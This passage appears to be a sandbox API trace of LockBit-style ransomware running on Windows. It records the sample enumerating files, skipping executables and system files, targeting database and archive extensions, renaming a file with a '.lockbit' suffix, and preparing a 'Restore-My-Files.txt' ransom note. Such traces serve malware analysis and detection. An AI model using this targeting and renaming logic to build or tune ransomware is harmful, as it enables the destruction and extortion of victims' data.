lstrcmpiW (lpString1=".nls", lpString2=".hash") returned 1 [0076.674] lstrcmpiW (lpString1=".diagcab", lpString2=".hash") returned -1 [0076.674] lstrcmpiW (lpString1=".lock", lpString2=".hash") returned 1 [0076.674] lstrcmpiW (lpString1=".ocx", lpString2=".hash") returned 1 [0076.675] lstrcmpiW (lpString1=".mpa", lpString2=".hash") returned 1 [0076.675] lstrcmpiW (lpString1=".cpl", lpString2=".hash") returned -1 [0076.675] lstrcmpiW (lpString1=".mod", lpString2=".hash") returned 1 [0076.675] lstrcmpiW (lpString1=".hta", lpString2=".hash") returned 1 [0076.675] lstrcmpiW (lpString1=".icns", lpString2=".hash") returned 1 [0076.675] lstrcmpiW (lpString1=".prf", lpString2=".hash") returned 1 [0076.675] lstrcmpiW (lpString1=".rtp", lpString2=".hash") returned 1 [0076.675] lstrcmpiW (lpString1=".diagcfg", lpString2=".hash") returned -1 [0076.675] lstrcmpiW (lpString1=".msstyles", lpString2=".hash") returned 1 [0076.675] lstrcmpiW (lpString1=".bin", lpString2=".hash") returned -1 [0076.675] lstrcmpiW (lpString1=".hlp", lpString2=".hash") returned 1 [0076.675] lstrcmpiW (lpString1=".shs", lpString2=".hash") returned 1 [0076.675] lstrcmpiW (lpString1=".drv", lpString2=".hash") returned -1 [0076.675] lstrcmpiW (lpString1=".wpx", lpString2=".hash") returned 1 [0076.675] lstrcmpiW (lpString1=".bat", lpString2=".hash") returned -1 [0076.675] lstrcmpiW (lpString1=".rom", lpString2=".hash") returned 1 [0076.675] lstrcmpiW (lpString1=".msc", lpString2=".hash") returned 1 [0076.675] lstrcmpiW (lpString1=".spl", lpString2=".hash") returned 1 [0076.675] lstrcmpiW (lpString1=".ps1", lpString2=".hash") returned 1 [0076.675] lstrcmpiW (lpString1=".msu", lpString2=".hash") returned 1 [0076.675] lstrcmpiW (lpString1=".ics", lpString2=".hash") returned 1 [0076.676] lstrcmpiW (lpString1=".key", lpString2=".hash") returned 1 [0076.676] lstrcmpiW (lpString1=".mp3", lpString2=".hash") returned 1 [0076.676] lstrcmpiW (lpString1=".reg", lpString2=".hash") returned 1 [0076.676] lstrcmpiW (lpString1=".dll", lpString2=".hash") returned -1 [0076.676] lstrcmpiW (lpString1=".ini", lpString2=".hash") returned 1 [0076.676] lstrcmpiW (lpString1=".idx", lpString2=".hash") returned 1 [0076.676] lstrcmpiW (lpString1=".sys", lpString2=".hash") returned 1 [0076.676] lstrcmpiW (lpString1=".hlp", lpString2=".hash") returned 1 [0076.676] lstrcmpiW (lpString1=".ico", lpString2=".hash") returned 1 [0076.676] lstrcmpiW (lpString1=".lnk", lpString2=".hash") returned 1 [0076.676] lstrcmpiW (lpString1=".rdp", lpString2=".hash") returned 1 [0076.676] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0076.676] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="i641033.hash") returned 1 [0076.676] lstrcmpiW (lpString1="ntldr", lpString2="i641033.hash") returned 1 [0076.676] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="i641033.hash") returned 1 [0076.676] lstrcmpiW (lpString1="bootsect.bak", lpString2="i641033.hash") returned -1 [0076.676] lstrcmpiW (lpString1="autorun.inf", lpString2="i641033.hash") returned -1 [0076.676] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\") returned="" [0076.676] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\i641033.hash") returned=".hash" [0076.676] lstrcmpiW (lpString1=".rar", lpString2=".hash") returned 1 [0076.677] lstrcmpiW (lpString1=".zip", lpString2=".hash") returned 1 [0076.677] lstrcmpiW (lpString1=".7z", lpString2=".hash") returned -1 [0076.677] lstrcmpiW (lpString1=".ckp", lpString2=".hash") returned -1 [0076.677] lstrcmpiW (lpString1=".dacpac", lpString2=".hash") returned -1 [0076.677] lstrcmpiW (lpString1=".db", lpString2=".hash") returned -1 [0076.677] lstrcmpiW (lpString1=".db-shm", lpString2=".hash") returned -1 [0076.677] lstrcmpiW (lpString1=".db-wal", lpString2=".hash") returned -1 [0076.677] lstrcmpiW (lpString1=".db3", lpString2=".hash") returned -1 [0076.677] lstrcmpiW (lpString1=".dbf", lpString2=".hash") returned -1 [0076.677] lstrcmpiW (lpString1=".dbc", lpString2=".hash") returned -1 [0076.677] lstrcmpiW (lpString1=".dbs", lpString2=".hash") returned -1 [0076.677] lstrcmpiW (lpString1=".dbt", lpString2=".hash") returned -1 [0076.677] lstrcmpiW (lpString1=".dbv", lpString2=".hash") returned -1 [0076.677] lstrcmpiW (lpString1=".frm", lpString2=".hash") returned -1 [0076.677] lstrcmpiW (lpString1=".mdf", lpString2=".hash") returned 1 [0076.677] lstrcmpiW (lpString1=".mrg", lpString2=".hash") returned 1 [0076.677] lstrcmpiW (lpString1=".mwb", lpString2=".hash") returned 1 [0076.677] lstrcmpiW (lpString1=".myd", lpString2=".hash") returned 1 [0076.677] lstrcmpiW (lpString1=".ndf", lpString2=".hash") returned 1 [0076.677] lstrcmpiW (lpString1=".qry", lpString2=".hash") returned 1 [0076.677] lstrcmpiW (lpString1=".sdb", lpString2=".hash") returned 1 [0076.677] lstrcmpiW (lpString1=".sdf", lpString2=".hash") returned 1 [0076.678] lstrcmpiW (lpString1=".sql", lpString2=".hash") returned 1 [0076.678] lstrcmpiW (lpString1=".sqlite", lpString2=".hash") returned 1 [0076.678] lstrcmpiW (lpString1=".sqlite3", lpString2=".hash") returned 1 [0076.678] lstrcmpiW (lpString1=".sqlitedb", lpString2=".hash") returned 1 [0076.678] lstrcmpiW (lpString1=".tmd", lpString2=".hash") returned 1 [0076.678] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\i641033.hash.lockbit") returned 79 [0076.678] lstrcmpiW (lpString1=".hash", lpString2=".lockbit") returned -1 [0076.678] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\i641033.hash.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash.lockbit")) returned 1 [0076.708] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\i641033.hash.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a4 [0076.708] CreateIoCompletionPort (FileHandle=0x3a4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0076.708] malloc (_Size=0x40068) returned 0x20abae0 [0076.708] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0x20abaf8 | out: lpFileSize=0x20abaf8*=102) returned 1 [0076.708] ReadFile (in: hFile=0x3a4, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 0x0 [0076.709] GetLastError () returned 0x3e5 [0076.709] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\i641033.hash" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun") returned 1 [0076.710] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Restore-My-Files.txt") returned 79 [0076.710] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.710] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d9c750, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x17d9c750, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x20031300, ftLastWriteTime.dwHighDateTime=0x1d0d7b1, nFileSizeHigh=0x0, nFileSizeLow=0x10ae80, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="IntegratedOffice.exe", cAlternateFileName="INTEGR~1.EXE")) returned 1 [0076.710] lstrcmpiW (lpString1=".", lpString2="IntegratedOffice.exe") returned -1 [0076.710] lstrcmpiW (lpString1="..", lpString2="IntegratedOffice.exe") returned -1 [0076.710] PathFindExtensionW (pszPath="IntegratedOffice.exe") returned=".exe" [0076.710] lstrcmpiW (lpString1=".386", lpString2=".exe") returned -1 [0076.710] lstrcmpiW (lpString1=".cmd", lpString2=".exe") returned -1 [0076.710] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0076.710] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d9c750, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x17d9c750, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x4ab8800, ftLastWriteTime.dwHighDateTime=0x1d0b36a, nFileSizeHigh=0x0, nFileSizeLow=0x578d8, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="MavInject32.exe", cAlternateFileName="MAVINJ~1.EXE")) returned 1 [0076.710] lstrcmpiW (lpString1=".", lpString2="MavInject32.exe") returned -1 [0076.710] lstrcmpiW (lpString1="..", lpString2="MavInject32.exe") returned -1 [0076.710] PathFindExtensionW (pszPath="MavInject32.exe") returned=".exe" [0076.710] lstrcmpiW (lpString1=".386", lpString2=".exe") returned -1 [0076.710] lstrcmpiW (lpString1=".cmd", lpString2=".exe") returned -1 [0076.710] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0076.710] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17dc28b0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x17dc28b0, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x6a38c400, ftLastWriteTime.dwHighDateTime=0x1d0d7b2, nFileSizeHigh=0x0, nFileSizeLow=0x2ffa60, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="mso20win32client.dll", cAlternateFileName="MSO20W~1.DLL")) returned 1 [0076.710] lstrcmpiW (lpString1=".", lpString2="mso20win32client.dll") returned -1 [0076.711] lstrcmpiW (lpString1="..", lpString2="mso20win32client.dll") returned -1 [0076.711] PathFindExtensionW (pszPath="mso20win32client.dll") returned=".dll" [0076.711] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.711] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.711] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.711] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.711] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.711] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.711] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.711] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.711] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.711] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.711] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.711] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.711] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.711] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.711] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.711] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.711] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.711] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.711] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.712] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.712] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.712] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.712] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.712] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.712] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.712] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.712] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.712] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.712] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.712] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.712] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.712] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.712] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.712] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.712] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.712] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.712] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.713] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.713] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0076.713] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17ecd250, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x17ecd250, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x6c9b1e00, ftLastWriteTime.dwHighDateTime=0x1d0d7b2, nFileSizeHigh=0x0, nFileSizeLow=0x475e60, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="mso30win32client.dll", cAlternateFileName="MSO30W~1.DLL")) returned 1 [0076.713] lstrcmpiW (lpString1=".", lpString2="mso30win32client.dll") returned -1 [0076.713] lstrcmpiW (lpString1="..", lpString2="mso30win32client.dll") returned -1 [0076.713] PathFindExtensionW (pszPath="mso30win32client.dll") returned=".dll" [0076.713] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.713] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.713] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.713] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.713] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.713] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.713] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.713] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.713] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.713] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.713] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.713] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.713] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.713] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.714] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.714] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.714] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.714] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.714] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.714] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.714] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.714] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.714] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.714] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.714] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.714] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.714] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.714] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.714] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.714] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.714] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.714] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.714] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.715] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.715] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.715] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.715] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.715] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.715] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0076.715] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17f19510, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x17f19510, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x18dc0500, ftLastWriteTime.dwHighDateTime=0x1d0d7b1, nFileSizeHigh=0x0, nFileSizeLow=0x307ac0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="mso40uires.dll", cAlternateFileName="MSO40U~1.DLL")) returned 1 [0076.715] lstrcmpiW (lpString1=".", lpString2="mso40uires.dll") returned -1 [0076.715] lstrcmpiW (lpString1="..", lpString2="mso40uires.dll") returned -1 [0076.715] PathFindExtensionW (pszPath="mso40uires.dll") returned=".dll" [0076.715] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.715] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.715] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.715] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.715] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.715] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.715] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.715] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.715] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.715] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.715] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.716] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.716] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.716] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.716] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.716] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.716] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.716] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.716] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.716] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.716] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.716] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.716] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.716] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.716] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.716] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.716] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.716] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.716] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.716] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.716] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.717] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.717] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.717] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.717] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.717] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.717] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.717] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.717] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0076.717] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17f3f670, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x17f3f670, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x7290ff00, ftLastWriteTime.dwHighDateTime=0x1d0d7b2, nFileSizeHigh=0x0, nFileSizeLow=0x8e6060, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="mso40uiwin32client.dll", cAlternateFileName="MSO40U~2.DLL")) returned 1 [0076.717] lstrcmpiW (lpString1=".", lpString2="mso40uiwin32client.dll") returned -1 [0076.717] lstrcmpiW (lpString1="..", lpString2="mso40uiwin32client.dll") returned -1 [0076.717] PathFindExtensionW (pszPath="mso40uiwin32client.dll") returned=".dll" [0076.717] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.717] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.717] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.717] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.717] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.717] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.717] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.717] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.717] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.718] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.718] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.718] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.718] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.718] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.718] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.718] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.718] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.718] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.718] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.718] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.718] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.718] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.718] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.718] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.718] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.718] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.718] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.718] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.718] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.718] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.719] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.719] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.719] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.719] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.719] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.719] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.719] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.719] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.719] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0076.719] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17606130, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x17606130, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x73c22c00, ftLastWriteTime.dwHighDateTime=0x1d0d7b2, nFileSizeHigh=0x0, nFileSizeLow=0xee60, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="msointl30.en-us.dll", cAlternateFileName="MSOINT~1.DLL")) returned 1 [0076.719] lstrcmpiW (lpString1=".", lpString2="msointl30.en-us.dll") returned -1 [0076.719] lstrcmpiW (lpString1="..", lpString2="msointl30.en-us.dll") returned -1 [0076.719] PathFindExtensionW (pszPath="msointl30.en-us.dll") returned=".dll" [0076.719] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.719] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.719] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.719] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.719] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.719] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.719] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.719] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.720] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.720] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.720] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.720] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.720] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.720] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.720] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.720] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.720] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.720] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.720] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.720] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.720] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.720] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.720] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.720] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.720] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.720] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.720] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.720] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.720] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.720] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.720] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.720] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.721] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.721] 